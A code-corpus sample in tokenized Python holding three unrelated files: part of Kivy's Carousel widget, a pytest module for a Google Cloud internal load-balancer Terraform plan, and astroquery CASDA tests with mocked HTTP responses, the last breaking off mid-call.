when a widget is added to Carousel using add_widget(). :attr:`slides` is a :class:`~kivy.properties.ListProperty` and is read-only. '''<def_stmt>_get_slides_container self<block_start><return>[x.parent<for>x self.slides]<block_end>slides_container=AliasProperty(_get_slides_container <none> bind=('slides' ))<line_sep>direction=OptionProperty('right' options=('right' 'left' 'top' 'bottom'))<line_sep>'''Specifies the direction in which the slides are ordered i.e. the direction from which the user swipes to go from one slide to the next. Can be `right`, `left`, 'top', or `bottom`. For example, with the default value of `right`, the second slide is to the right of the first and the user would swipe from the right towards the left to get to the second slide. :attr:`direction` is a :class:`~kivy.properties.OptionProperty` and defaults to 'right'. '''<line_sep>min_move=NumericProperty(0.2)<line_sep>'''Defines the minimal distance from the edge where the movement is considered a swipe gesture and the Carousel will change its content. This is a percentage of the Carousel width. If the movement doesn't reach this minimal value, then the movement is cancelled and the content is restored to its original position. :attr:`min_move` is a :class:`~kivy.properties.NumericProperty` and defaults to 0.2. '''<line_sep>anim_move_duration=NumericProperty(0.5)<line_sep>'''Defines the duration of the Carousel animation between pages. :attr:`anim_move_duration` is a :class:`~kivy.properties.NumericProperty` and defaults to 0.5. '''<line_sep>anim_cancel_duration=NumericProperty(0.3)<line_sep>'''Defines the duration of the animation when a swipe movement is not accepted. This is generally when the user doesnt swipe enough. See :attr:`min_move`. :attr:`anim_cancel_duration` is a :class:`~kivy.properties.NumericProperty` and defaults to 0.3. '''<line_sep>loop=BooleanProperty(<false>)<line_sep>'''Allow the Carousel to swipe infinitely. When the user reaches the last page, they will return to first page when trying to swipe to the next. :attr:`loop` is a :class:`~kivy.properties.BooleanProperty` and defaults to False. '''<def_stmt>_get_index self<block_start><if_stmt>self.slides<block_start><return>self._index%len(self.slides)<block_end><return><none><block_end><def_stmt>_set_index self value<block_start><if_stmt>self.slides<block_start>self._index=value%len(self.slides)<block_end><else_stmt><block_start>self._index=<none><block_end><block_end>index=AliasProperty(_get_index _set_index bind=('_index' 'slides'))<line_sep>'''Get/Set the current visible slide based on the index. :attr:`index` is a :class:`~kivy.properties.AliasProperty` and defaults to 0 (the first item). '''<def_stmt>_prev_slide self<block_start>slides=self.slides<line_sep>len_slides=len(slides)<line_sep>index=self.index<if_stmt>len_slides<l>2# None, or 1 slide <block_start><return><none><block_end><if_stmt>len_slides<eq>2<block_start><if_stmt>index<eq>0<block_start><return><none><block_end><if_stmt>index<eq>1<block_start><return>slides[0]<block_end><block_end><if_stmt>self.loop<and>index<eq>0<block_start><return>slides[-1]<block_end><if_stmt>index<g>0<block_start><return>slides[index-1]<block_end><block_end>previous_slide=AliasProperty(_prev_slide <none> bind=('slides' 'index'))<line_sep>'''The previous slide in the Carousel. It is None if the current slide is the first slide in the Carousel. If :attr:`orientation` is 'horizontal', the previous slide is to the left. If :attr:`orientation` is 'vertical', the previous slide towards the bottom. :attr:`previous_slide` is a :class:`~kivy.properties.AliasProperty`. .. versionchanged:: 1.5.0 This property doesn't expose the container used for storing the slide. It returns the widget you have added. '''<def_stmt>_curr_slide self<block_start><if_stmt>len(self.slides)<block_start><return>self.slides[self.index]<block_end><block_end>current_slide=AliasProperty(_curr_slide <none> bind=('slides' 'index'))<line_sep>'''The currently shown slide. :attr:`current_slide` is an :class:`~kivy.properties.AliasProperty`. .. versionchanged:: 1.5.0 The property doesn't expose the container used for storing the slide. It returns widget you have added. '''<def_stmt>_next_slide self<block_start><if_stmt>len(self.slides)<l>2# None, or 1 slide <block_start><return><none><block_end><if_stmt>len(self.slides)<eq>2<block_start><if_stmt>self.index<eq>0<block_start><return>self.slides[1]<block_end><if_stmt>self.index<eq>1<block_start><return><none><block_end><block_end><if_stmt>self.loop<and>self.index<eq>len(self.slides)-1<block_start><return>self.slides[0]<block_end><if_stmt>self.index<l>len(self.slides)-1<block_start><return>self.slides[self.index+1]<block_end><block_end>next_slide=AliasProperty(_next_slide <none> bind=('slides' 'index'))<line_sep>'''The next slide in the Carousel. It is None if the current slide is the last slide in the Carousel. If :attr:`orientation` is 'horizontal', the next slide is to the right. If :attr:`orientation` is 'vertical', the next slide is towards the bottom. :attr:`next_slide` is a :class:`~kivy.properties.AliasProperty`. .. versionchanged:: 1.5.0 The property doesn't expose the container used for storing the slide. It returns the widget you have added. '''<line_sep>scroll_timeout=NumericProperty(200)<line_sep>'''Timeout allowed to trigger the :attr:`scroll_distance`, in milliseconds. If the user has not moved :attr:`scroll_distance` within the timeout, the scrolling will be disabled and the touch event will go to the children. :attr:`scroll_timeout` is a :class:`~kivy.properties.NumericProperty` and defaults to 200 (milliseconds) .. versionadded:: 1.5.0 '''<line_sep>scroll_distance=NumericProperty('20dp')<line_sep>'''Distance to move before scrolling the :class:`Carousel` in pixels. As soon as the distance has been traveled, the :class:`Carousel` will start to scroll, and no touch event will go to children. It is advisable that you base this value on the dpi of your target device's screen. :attr:`scroll_distance` is a :class:`~kivy.properties.NumericProperty` and defaults to 20dp. .. versionadded:: 1.5.0 '''<line_sep>anim_type=StringProperty('out_quad')<line_sep>'''Type of animation to use while animating in the next/previous slide. .. versionadded:: 1.8.0 '''<line_sep>#### private properties, for internal use only ### _index=NumericProperty(0 allownone=<true>)<line_sep>_prev=ObjectProperty(<none> allownone=<true>)<line_sep>_current=ObjectProperty(<none> allownone=<true>)<line_sep>_next=ObjectProperty(<none> allownone=<true>)<line_sep>_offset=NumericProperty(0)<line_sep>_touch=ObjectProperty(<none> allownone=<true>)<def_stmt>__init__ self **kwargs<block_start>self._trigger_position_visible_slides=Clock.create_trigger(self._position_visible_slides -1)<line_sep>super(Carousel self).__init__(**kwargs)<line_sep>self._skip_slide=<none><block_end><def_stmt>load_slide self slide<block_start>'''Animate to the slide that is passed as the argument. .. versionchanged:: 1.8.0 '''<line_sep>slides=self.slides<line_sep>start,stop=slides.index(self.current_slide) slides.index(slide)<if_stmt>start<eq>stop<block_start><return><block_end>self._skip_slide=stop<if_stmt>stop<g>start<block_start>self._insert_visible_slides(_next_slide=slide)<line_sep>self.load_next()<block_end><else_stmt><block_start>self._insert_visible_slides(_prev_slide=slide)<line_sep>self.load_previous()<block_end><block_end><def_stmt>load_previous self<block_start>'''Animate to the previous slide. .. versionadded:: 1.7.0 '''<line_sep>self.load_next(mode='prev')<block_end><def_stmt>load_next self mode='next'<block_start>'''Animate to next slide. .. versionadded:: 1.7.0 '''<if_stmt><not>self.index<is><none><block_start>w,h=self.size<line_sep>_direction={'top':-h/2 'bottom':h/2 'left':w/2 'right':-w/2}<line_sep>_offset=_direction[self.direction]<if_stmt>mode<eq>'prev'<block_start>_offset=-_offset<block_end>self._start_animation(min_move=0 offset=_offset)<block_end><block_end><def_stmt>get_slide_container self slide<block_start><return>slide.parent<block_end><def_stmt>_insert_visible_slides self _next_slide=<none> _prev_slide=<none><block_start>get_slide_container=self.get_slide_container<line_sep>previous_slide=_prev_slide<if>_prev_slide<else>self.previous_slide<if_stmt>previous_slide<block_start>self._prev=get_slide_container(previous_slide)<block_end><else_stmt><block_start>self._prev=<none><block_end>current_slide=self.current_slide<if_stmt>current_slide<block_start>self._current=get_slide_container(current_slide)<block_end><else_stmt><block_start>self._current=<none><block_end>next_slide=_next_slide<if>_next_slide<else>self.next_slide<if_stmt>next_slide<block_start>self._next=get_slide_container(next_slide)<block_end><else_stmt><block_start>self._next=<none><block_end>super_remove=super(Carousel self).remove_widget<for_stmt>container self.slides_container<block_start>super_remove(container)<block_end><if_stmt>self._prev<block_start>super(Carousel self).add_widget(self._prev)<block_end><if_stmt>self._next<block_start>super(Carousel self).add_widget(self._next)<block_end><if_stmt>self._current<block_start>super(Carousel self).add_widget(self._current)<block_end><block_end><def_stmt>_position_visible_slides self *args<block_start>slides,index=self.slides self.index<line_sep>no_of_slides=len(slides)-1<if_stmt><not>slides<block_start><return><block_end>x,y,width,height=self.x self.y self.width self.height<line_sep>_offset,direction=self._offset self.direction<line_sep>_prev,_next,_current=self._prev self._next self._current<line_sep>get_slide_container=self.get_slide_container<line_sep>last_slide=get_slide_container(slides[-1])<line_sep>first_slide=get_slide_container(slides[0])<line_sep>skip_next=<false><line_sep>_loop=self.loop<if_stmt>direction[0]<in>['r' 'l']<block_start>xoff=x+_offset<line_sep>x_prev={'l':xoff+width 'r':xoff-width}<line_sep>x_next={'l':xoff-width 'r':xoff+width}<if_stmt>_prev<block_start>_prev.pos=(x_prev[direction[0]] y)<block_end><elif_stmt>_loop<and>_next<and>index<eq>0# if first slide is moving to right with direction set to right # or toward left with direction set to left <block_start><if_stmt>((_offset<g>0<and>direction[0]<eq>'r')<or>(_offset<l>0<and>direction[0]<eq>'l'))# put last_slide before first slide <block_start>last_slide.pos=(x_prev[direction[0]] y)<line_sep>skip_next=<true><block_end><block_end><if_stmt>_current<block_start>_current.pos=(xoff y)<block_end><if_stmt>skip_next<block_start><return><block_end><if_stmt>_next<block_start>_next.pos=(x_next[direction[0]] y)<block_end><elif_stmt>_loop<and>_prev<and>index<eq>no_of_slides<block_start><if_stmt>((_offset<l>0<and>direction[0]<eq>'r')<or>(_offset<g>0<and>direction[0]<eq>'l'))<block_start>first_slide.pos=(x_next[direction[0]] y)<block_end><block_end><block_end><if_stmt>direction[0]<in>['t' 'b']<block_start>yoff=y+_offset<line_sep>y_prev={'t':yoff-height 'b':yoff+height}<line_sep>y_next={'t':yoff+height 'b':yoff-height}<if_stmt>_prev<block_start>_prev.pos=(x y_prev[direction[0]])<block_end><elif_stmt>_loop<and>_next<and>index<eq>0<block_start><if_stmt>((_offset<g>0<and>direction[0]<eq>'t')<or>(_offset<l>0<and>direction[0]<eq>'b'))<block_start>last_slide.pos=(x y_prev[direction[0]])<line_sep>skip_next=<true><block_end><block_end><if_stmt>_current<block_start>_current.pos=(x yoff)<block_end><if_stmt>skip_next<block_start><return><block_end><if_stmt>_next<block_start>_next.pos=(x y_next[direction[0]])<block_end><elif_stmt>_loop<and>_prev<and>index<eq>no_of_slides<block_start><if_stmt>((_offset<l>0<and>direction[0]<eq>'t')<or>(_offset<g>0<and>direction[0]<eq>'b'))<block_start>first_slide.pos=(x y_next[direction[0]])<block_end><block_end><block_end><block_end><def_stmt>on_size self *args<block_start>size=self.size<for_stmt>slide self.slides_container<block_start>slide.size=size<block_end>self._trigger_position_visible_slides()<block_end><def_stmt>on_pos self *args<block_start>self._trigger_position_visible_slides()<block_end><def_stmt>on_index self *args<block_start>self._insert_visible_slides()<line_sep>self._trigger_position_visible_slides()<line_sep>self._offset=0<block_end><def_stmt>on_slides self *args<block_start><if_stmt>self.slides<block_start>self.index=self.index%len(self.slides)<block_end>self._insert_visible_slides()<line_sep>self._trigger_position_visible_slides()<block_end><def_stmt>on__offset self *args<block_start>self._trigger_position_visible_slides()<line_sep># if reached full offset, switch index to next or prev direction=self.direction<line_sep>_offset=self._offset<line_sep>width=self.width<line_sep>height=self.height<line_sep>index=self.index<if_stmt>self._skip_slide<is><not><none><or>index<is><none><block_start><return><block_end><if_stmt>direction[0]<eq>'r'<block_start><if_stmt>_offset<le>-width<block_start>index<augadd>1<block_end><if_stmt>_offset<ge>width<block_start>index<augsub>1<block_end><block_end><if_stmt>direction[0]<eq>'l'<block_start><if_stmt>_offset<le>-width<block_start>index<augsub>1<block_end><if_stmt>_offset<ge>width<block_start>index<augadd>1<block_end><block_end><if_stmt>direction[0]<eq>'t'<block_start><if_stmt>_offset<le>-height<block_start>index<augadd>1<block_end><if_stmt>_offset<ge>height<block_start>index<augsub>1<block_end><block_end><if_stmt>direction[0]<eq>'b'<block_start><if_stmt>_offset<le>-height<block_start>index<augsub>1<block_end><if_stmt>_offset<ge>height<block_start>index<augadd>1<block_end><block_end>self.index=index<block_end><def_stmt>_start_animation self *args **kwargs# compute target offset for ease back, next or prev <block_start>new_offset=0<line_sep>direction=kwargs.get('direction' self.direction)<line_sep>is_horizontal=direction[0]<in>['r' 'l']<line_sep>extent=self.width<if>is_horizontal<else>self.height<line_sep>min_move=kwargs.get('min_move' self.min_move)<line_sep>_offset=kwargs.get('offset' self._offset)<if_stmt>_offset<l>min_move<times>-extent<block_start>new_offset=-extent<block_end><elif_stmt>_offset<g>min_move<times>extent<block_start>new_offset=extent<block_end># if new_offset is 0, it wasnt enough to go next/prev dur=self.anim_move_duration<if_stmt>new_offset<eq>0<block_start>dur=self.anim_cancel_duration<block_end># detect edge cases if not looping len_slides=len(self.slides)<line_sep>index=self.index<if_stmt><not>self.loop<or>len_slides<eq>1<block_start>is_first=(index<eq>0)<line_sep>is_last=(index<eq>len_slides-1)<if_stmt>direction[0]<in>['r' 't']<block_start>towards_prev=(new_offset<g>0)<line_sep>towards_next=(new_offset<l>0)<block_end><else_stmt><block_start>towards_prev=(new_offset<l>0)<line_sep>towards_next=(new_offset<g>0)<block_end><if_stmt>(is_first<and>towards_prev)<or>(is_last<and>towards_next)<block_start>new_offset=0<block_end><block_end>anim=Animation(_offset=new_offset d=dur t=self.anim_type)<line_sep>anim.cancel_all(self)<def_stmt>_cmp *l<block_start><if_stmt>self._skip_slide<is><not><none><block_start>self.index=self._skip_slide<line_sep>self._skip_slide=<none><block_end><block_end>anim.bind(on_complete=_cmp)<line_sep>anim.start(self)<block_end><def_stmt>_get_uid self prefix='sv'<block_start><return>'{0}.{1}'.format(prefix self.uid)<block_end><def_stmt>on_touch_down self touch<block_start><if_stmt><not>self.collide_point(*touch.pos)<block_start>touch.ud[self._get_uid('cavoid')]=<true><line_sep><return><block_end><if_stmt>self.disabled<block_start><return><true><block_end><if_stmt>self._touch<block_start><return>super(Carousel self).on_touch_down(touch)<block_end>Animation.cancel_all(self)<line_sep>self._touch=touch<line_sep>uid=self._get_uid()<line_sep>touch.grab(self)<line_sep>touch.ud[uid]={'mode':'unknown' 'time':touch.time_start}<line_sep>Clock.schedule_once(self._change_touch_mode self.scroll_timeout/1000.)<line_sep><return><true><block_end><def_stmt>on_touch_move self touch<block_start><if_stmt>self._get_uid('cavoid')<in>touch.ud<block_start><return><block_end><if_stmt>self._touch<is><not>touch<block_start>super(Carousel self).on_touch_move(touch)<line_sep><return>self._get_uid()<in>touch.ud<block_end><if_stmt>touch.grab_current<is><not>self<block_start><return><true><block_end>ud=touch.ud[self._get_uid()]<line_sep>direction=self.direction<if_stmt>ud['mode']<eq>'unknown'<block_start><if_stmt>direction[0]<in>('r' 'l')<block_start>distance=abs(touch.ox-touch.x)<block_end><else_stmt><block_start>distance=abs(touch.oy-touch.y)<block_end><if_stmt>distance<g>self.scroll_distance<block_start>Clock.unschedule(self._change_touch_mode)<line_sep>ud['mode']='scroll'<block_end><block_end><else_stmt><block_start><if_stmt>direction[0]<in>('r' 'l')<block_start>self._offset<augadd>touch.dx<block_end><if_stmt>direction[0]<in>('t' 'b')<block_start>self._offset<augadd>touch.dy<block_end><block_end><return><true><block_end><def_stmt>on_touch_up self touch<block_start><if_stmt>self._get_uid('cavoid')<in>touch.ud<block_start><return><block_end><if_stmt>self<in>[x()<for>x touch.grab_list]<block_start>touch.ungrab(self)<line_sep>self._touch=<none><line_sep>ud=touch.ud[self._get_uid()]<if_stmt>ud['mode']<eq>'unknown'<block_start>Clock.unschedule(self._change_touch_mode)<line_sep>super(Carousel self).on_touch_down(touch)<line_sep>Clock.schedule_once(partial(self._do_touch_up touch) .1)<block_end><else_stmt><block_start>self._start_animation()<block_end><block_end><else_stmt><block_start><if_stmt>self._touch<is><not>touch<and>self.uid<not><in>touch.ud<block_start>super(Carousel self).on_touch_up(touch)<block_end><block_end><return>self._get_uid()<in>touch.ud<block_end><def_stmt>_do_touch_up self touch *largs<block_start>super(Carousel self).on_touch_up(touch)<line_sep># don't forget about grab event! <for_stmt>x touch.grab_list[:]<block_start>touch.grab_list.remove(x)<line_sep>x=x()<if_stmt><not>x<block_start><continue><block_end>touch.grab_current=x<line_sep>super(Carousel self).on_touch_up(touch)<block_end>touch.grab_current=<none><block_end><def_stmt>_change_touch_mode self *largs<block_start><if_stmt><not>self._touch<block_start><return><block_end>self._start_animation()<line_sep>uid=self._get_uid()<line_sep>touch=self._touch<line_sep>ud=touch.ud[uid]<if_stmt>ud['mode']<eq>'unknown'<block_start>touch.ungrab(self)<line_sep>self._touch=<none><line_sep>super(Carousel self).on_touch_down(touch)<line_sep><return><block_end><block_end><def_stmt>add_widget self widget index=0<block_start>slide=RelativeLayout(size=self.size x=self.x-self.width y=self.y)<line_sep>slide.add_widget(widget)<line_sep>super(Carousel self).add_widget(slide index)<if_stmt>index<ne>0<block_start>self.slides.insert(index widget)<block_end><else_stmt><block_start>self.slides.append(widget)<block_end><block_end><def_stmt>remove_widget self widget *args **kwargs# XXX be careful, the widget.parent refer to the RelativeLayout # added in add_widget(). But it will break if RelativeLayout # implementation change. # if we passed the real widget <block_start><if_stmt>widget<in>self.slides<block_start>slide=widget.parent<line_sep>self.slides.remove(widget)<line_sep><return>slide.remove_widget(widget *args **kwargs)<block_end><return>super(Carousel self).remove_widget(widget *args **kwargs)<block_end><def_stmt>clear_widgets self<block_start><for_stmt>slide self.slides[:]<block_start>self.remove_widget(slide)<block_end>super(Carousel self).clear_widgets()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_from_stmt>kivy.app App<class_stmt>Example1(App)<block_start><def_stmt>build self<block_start>carousel=Carousel(direction='left' loop=<true>)<for_stmt>i range(4)<block_start>src="http://placehold.it/480x270.png&text=slide-%d&.png"%i<line_sep>image=Factory.AsyncImage(source=src allow_stretch=<true>)<line_sep>carousel.add_widget(image)<block_end><return>carousel<block_end><block_end>Example1().run()<block_end>
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>os<import_stmt>pytest<line_sep>FIXTURES_DIR=os.path.join(os.path.dirname(__file__) 'fixture')<line_sep>_BACKENDS='[{balancing_mode="CONNECTION", group="foo", failover=false}]'<def_stmt>test_defaults plan_runner<block_start>"Test variable defaults."<line_sep>_,resources=plan_runner(FIXTURES_DIR backends=_BACKENDS)<assert_stmt>len(resources)<eq>3<line_sep>resources=dict((r['type'] r['values'])<for>r resources)<line_sep>fwd_rule=resources['google_compute_forwarding_rule']<assert_stmt>fwd_rule['load_balancing_scheme']<eq>'INTERNAL'<assert_stmt>fwd_rule['all_ports']<assert_stmt>fwd_rule['allow_global_access']<is><none><line_sep>backend=resources['google_compute_region_backend_service']<assert_stmt>len(backend['backend'])<eq>1<assert_stmt>backend['backend'][0]['group']<eq>'foo'<line_sep>health_check=resources['google_compute_health_check']<for_stmt>k,v health_check.items()<block_start><if_stmt>k<eq>'http_health_check'<block_start><assert_stmt>len(v)<eq>1<assert_stmt>v[0]['port_specification']<eq>'USE_SERVING_PORT'<block_end><elif_stmt>k.endswith('_health_check')<block_start><assert_stmt>len(v)<eq>0<block_end><block_end><block_end><def_stmt>test_forwarding_rule plan_runner<block_start>"Test forwarding rule variables."<line_sep>_,resources=plan_runner(FIXTURES_DIR backends=_BACKENDS global_access='true' ports="[80]")<assert_stmt>len(resources)<eq>3<line_sep>values=[r['values']<for>r resources<if>r['type']<eq>'google_compute_forwarding_rule'][0]<assert_stmt><not>values['all_ports']<assert_stmt>values['ports']<eq>['80']<assert_stmt>values['allow_global_access']<block_end>
# -*- coding: utf-8 -* # Licensed under a 3-clause BSD style license - see LICENSE.rst <import_stmt>pytest<import_stmt>requests<import_stmt>os<import_from_stmt>astropy.coordinates SkyCoord<import_stmt>astropy.units<as>u<import_from_stmt>astropy.table Table Column<import_from_stmt>astropy.io.votable parse<import_from_stmt>astroquery log<import_from_stmt>astroquery.casda Casda<try_stmt><block_start><import_from_stmt>unittest.mock Mock patch PropertyMock MagicMock<block_end><except_stmt>ImportError<block_start>pytest.skip("Install mock for the casda tests." allow_module_level=<true>)<block_end>DATA_FILES={'CIRCLE':'cone.xml' 'RANGE':'box.xml' 'DATALINK':'datalink.xml' 'RUN_JOB':'run_job.xml' 'COMPLETED_JOB':'completed_job.xml' 'DATALINK_NOACCESS':'datalink_noaccess.xml'}<class_stmt>MockResponse<block_start><def_stmt>__init__ self content<block_start>self.content=content<line_sep>self.text=content.decode()<block_end><def_stmt>raise_for_status self<block_start><return><block_end><block_end>first_job_pass=<true><def_stmt>get_mockreturn self method url data=<none> timeout=10 files=<none> params=<none> headers=<none> **kwargs<block_start>log.debug("get_mockreturn url:{} params:{} kwargs:{}".format(url params kwargs))<if_stmt>kwargs<and>'auth'<in>kwargs<block_start>auth=kwargs['auth']<if_stmt>auth<and>(auth[0]<ne>'user'<or>auth[1]<ne>'password')<block_start>log.debug("Rejecting credentials")<line_sep><return>create_auth_failure_response()<block_end><block_end><if_stmt>'data/async'<in>str(url)# Responses for an asynchronous SODA job <block_start><if_stmt>str(url).endswith('data/async')<block_start>self.first_job_pass=<true><line_sep><return>create_soda_create_response('111-000-111-000')<block_end><elif_stmt>str(url).endswith('/phase')<and>method<eq>'POST'<block_start>key="RUN_JOB"<block_end><elif_stmt>str(url).endswith('111-000-111-000')<and>method<eq>'GET'<block_start>key="RUN_JOB"<if>self.first_job_pass<else>"COMPLETED_JOB"<line_sep>self.first_job_pass=<false><block_end><else_stmt><block_start><raise>ValueError("Unexpected SODA async {} call to url {}".format(method url))<block_end><block_end><elif_stmt>'datalink'<in>str(url)<block_start><if_stmt>'cube-244'<in>str(url)<block_start>key='DATALINK'<block_end><else_stmt><block_start>key='DATALINK_NOACCESS'<block_end><block_end><else_stmt><block_start>key=params['POS'].split()[0]<if>params['POS']<else><none><block_end>filename=data_path(DATA_FILES[key])<line_sep>log.debug('providing '+filename)<line_sep>content=open(filename 'rb').read()<line_sep><return>MockResponse(content)<block_end><def_stmt>create_soda_create_response jobid<block_start>job_url='https://casda.csiro.au/casda_data_access/data/async/'+jobid<line_sep>create_response_headers=[['location' job_url]]<line_sep>create_response=Mock(spec=requests.Response)<line_sep>create_response.configure_mock(status_code=303 message='OK' headers=create_response_headers url=job_url)<line_sep><return>create_response<block_end><def_stmt>create_auth_failure_response <block_start>unauthenticated_headers=[['WWW-Authenticate' 'Basic realm="ATNF OPAL Login"']]<line_sep>create_response=MagicMock(spec=requests.Response)<line_sep>attrs={'raise_for_status.side_effect':requests.exceptions.HTTPError()}<line_sep>create_response.configure_mock(status_code=401 message='OK' headers=unauthenticated_headers **attrs)<line_sep><return>create_response<block_end>@pytest.fixture<def_stmt>patch_get request<block_start><try_stmt><block_start>mp=request.getfixturevalue("monkeypatch")<block_end><except_stmt>AttributeError# pytest < 3 <block_start>mp=request.getfuncargvalue("monkeypatch")<block_end>mp.setattr(requests.Session 'request' get_mockreturn)<line_sep><return>mp<block_end><def_stmt>data_path filename<block_start>data_dir=os.path.join(os.path.dirname(__file__) 'data')<line_sep><return>os.path.join(data_dir filename)<block_end><def_stmt>isclose value1 value2 abs_tol=1e-09<block_start><return>abs(value1-value2)<l>abs_tol<block_end><def_stmt>test_query_region_text_radius patch_get<block_start>ra=333.9092<line_sep>dec=-45.8418<line_sep>radius=0.5<line_sep>query_payload=Casda.query_region('22h15m38.2s -45d50m30.5s' radius=radius<times>u.deg cache=<false> get_query_payload=<true>)<assert_stmt>isinstance(query_payload dict)<assert_stmt>'POS'<in>query_payload<assert_stmt>query_payload['POS'].startswith('CIRCLE 333')<line_sep>pos_parts=query_payload['POS'].split(' ')<assert_stmt>pos_parts[0]<eq>'CIRCLE'<assert_stmt>isclose(float(pos_parts[1]) ra abs_tol=1e-4)<assert_stmt>isclose(float(pos_parts[2]) dec abs_tol=1e-4)<assert_stmt>isclose(float(pos_parts[3]) radius)<assert_stmt>len(pos_parts)<eq>4<line_sep>responses=Casda.query_region('22h15m38.2s -45d50m30.5s' radius=0.5<times>u.deg cache=<false>)<assert_stmt>isinstance(responses Table)<assert_stmt>len(responses)<eq>3<block_end><def_stmt>test_query_region_radius patch_get<block_start>ra=333.9092<line_sep>dec=-45.8418<line_sep>radius=0.5<line_sep>centre=SkyCoord(ra dec unit=('deg' 'deg'))<line_sep>query_payload=Casda.query_region(centre radius=radius<times>u.deg cache=<false> get_query_payload=<true>)<assert_stmt>isinstance(query_payload dict)<assert_stmt>'POS'<in>query_payload<assert_stmt>query_payload['POS'].startswith('CIRCLE 333')<line_sep>pos_parts=query_payload['POS'].split(' ')<assert_stmt>pos_parts[0]<eq>'CIRCLE'<assert_stmt>isclose(float(pos_parts[1]) ra abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[2]) dec abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[3]) radius)<assert_stmt>len(pos_parts)<eq>4<line_sep>responses=Casda.query_region(centre radius=0.5<times>u.deg cache=<false>)<assert_stmt>isinstance(responses Table)<assert_stmt>len(responses)<eq>3<block_end><def_stmt>test_query_region_async_radius patch_get<block_start>ra=333.9092<line_sep>dec=-45.8418<line_sep>radius=0.5<line_sep>centre=SkyCoord(ra dec unit=('deg' 'deg'))<line_sep>query_payload=Casda.query_region_async(centre radius=radius<times>u.deg cache=<false> get_query_payload=<true>)<assert_stmt>isinstance(query_payload dict)<assert_stmt>'POS'<in>query_payload<assert_stmt>query_payload['POS'].startswith('CIRCLE 333')<line_sep>pos_parts=query_payload['POS'].split(' ')<assert_stmt>pos_parts[0]<eq>'CIRCLE'<assert_stmt>isclose(float(pos_parts[1]) ra abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[2]) dec abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[3]) radius)<assert_stmt>len(pos_parts)<eq>4<line_sep>responses=Casda.query_region_async(centre radius=0.5<times>u.deg cache=<false>)<assert_stmt>isinstance(responses MockResponse)<block_end><def_stmt>test_query_region_box patch_get<block_start>ra=333.9092<line_sep>dec=-45.8418<line_sep>width=0.5<line_sep>height=0.2<line_sep>centre=SkyCoord(ra dec unit=('deg' 'deg'))<line_sep>query_payload=Casda.query_region(centre width=width<times>u.deg height=height<times>u.deg cache=<false> get_query_payload=<true>)<assert_stmt>isinstance(query_payload dict)<assert_stmt>'POS'<in>query_payload<assert_stmt>query_payload['POS'].startswith('RANGE 333')<line_sep>pos_parts=query_payload['POS'].split(' ')<assert_stmt>pos_parts[0]<eq>'RANGE'<assert_stmt>isclose(float(pos_parts[1]) ra-width/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[2]) ra+width/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[3]) dec-height/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[4]) dec+height/2 abs_tol=1e-5)<assert_stmt>len(pos_parts)<eq>5<line_sep>responses=Casda.query_region(centre width=width<times>u.deg height=height<times>u.deg cache=<false>)<assert_stmt>isinstance(responses Table)<assert_stmt>len(responses)<eq>2<block_end><def_stmt>test_query_region_async_box patch_get<block_start>ra=333.9092<line_sep>dec=-45.8418<line_sep>width=0.5<line_sep>height=0.2<line_sep>centre=SkyCoord(ra dec unit=('deg' 'deg'))<line_sep>query_payload=Casda.query_region_async(centre width=width<times>u.deg height=height<times>u.deg cache=<false> get_query_payload=<true>)<assert_stmt>isinstance(query_payload dict)<assert_stmt>'POS'<in>query_payload<assert_stmt>query_payload['POS'].startswith('RANGE 333')<line_sep>pos_parts=query_payload['POS'].split(' ')<assert_stmt>pos_parts[0]<eq>'RANGE'<assert_stmt>isclose(float(pos_parts[1]) ra-width/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[2]) ra+width/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[3]) dec-height/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[4]) dec+height/2 abs_tol=1e-5)<assert_stmt>len(pos_parts)<eq>5<line_sep>responses=Casda.query_region_async(centre width=width<times>u.deg height=height<times>u.deg cache=<false>)<assert_stmt>isinstance(responses MockResponse)<block_end><def_stmt>test_filter_out_unreleased <block_start>all_records=parse(data_path('partial_unreleased.xml') verify='warn').get_first_table().to_table()<assert_stmt>all_records[0]['obs_release_date']<eq>'2017-08-02T03:51:19.728Z'<assert_stmt>all_records[1]['obs_release_date']<eq>'2218-01-02T16:51:00.728Z'<assert_stmt>all_records[2]['obs_release_date']<eq>''<assert_stmt>len(all_records)<eq>3<line_sep># This should filter out the rows with either a future obs_release_date or no obs_release_date filtered=Casda.filter_out_unreleased(all_records)<assert_stmt>filtered[0]['obs_release_date']<eq>'2017-08-02T03:51:19.728Z'<assert_stmt>filtered[0]['obs_publisher_did']<eq>'cube-502'<assert_stmt>len(filtered)<eq>1<block_end><def_stmt>test_stage_data_unauthorised patch_get<block_start>table=Table()<with_stmt>pytest.raises(ValueError)<as>excinfo<block_start>Casda.stage_data(table)<block_end><assert_stmt>"Credentials must be supplied"<in>str(excinfo.value)<block_end><def_stmt>test_stage_data_empty patch_get<block_start>table=Table()<line_sep>casda=Casda('user' 'password')<line_sep>urls=casda.stage_data(table)<assert_stmt>urls<eq>[]<block_end><def_stmt>test_stage_data_invalid_credentials patch_get<block_start>prefix='https://somewhere/casda/datalink/links?'<line_sep>access_urls=[prefix+'cube-220']<line_sep>table=Table([Column(data=access_urls name='access_url')])<line_sep>casda=Casda('user' '<PASSWORD>')<with_stmt>pytest.raises(requests.exceptions.HTTPError)<as>excinfo<block_start>casda.stage_data(table)<block_end><block_end><def_stmt>test_stage_data_no_link patch_get<block_start>prefix='https://somewhere/casda/datalink/links?'<line_sep>access_urls=[prefix+'cube-240']<line_sep>table=Table([Column(data=access_urls name='access_url')])<line_sep>casda=Casda('user' 